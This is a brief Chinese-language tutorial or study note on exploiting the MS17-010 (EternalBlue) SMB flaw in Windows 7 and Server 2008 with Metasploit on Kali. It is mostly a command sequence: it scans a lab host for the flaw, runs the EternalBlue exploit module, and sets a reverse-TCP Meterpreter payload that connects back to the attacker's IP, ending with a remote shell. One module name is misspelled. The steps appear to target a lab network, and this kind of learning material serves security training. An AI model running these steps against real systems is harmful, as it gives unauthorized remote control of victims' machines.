使用漏洞,工具:kail下的metasploit
文件共享服务,存在安全隐患
smb服务 服务上有漏洞
有关于smb的一个漏洞
漏洞编号:ms17-010
存在该漏洞的常用操作系统:2008 window 7
做服务器需要关闭防火墙,不给其他人提供服务了
kail下的MSF
先ping通,启动msf
启动命令:msfconsole
辅助模块:auxiliary 收集信息、测试
攻击模块:exploits 模块里面有攻击载荷:payloads
命令:use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.10.6 设置目标地址
run 看是否存在漏洞
使用攻击模块
use exploit/windows/smb/ms17_010_eternablue
show options
set rhosts 192.168.10.6
set payload windows/x64/meterpreter/reverse_tcp 反向tcp连接
set lhost 192.168.10.128 配置载荷,让受害者连自己的ip
exploit
当出现meterpreter > 证明攻击完成
输入shell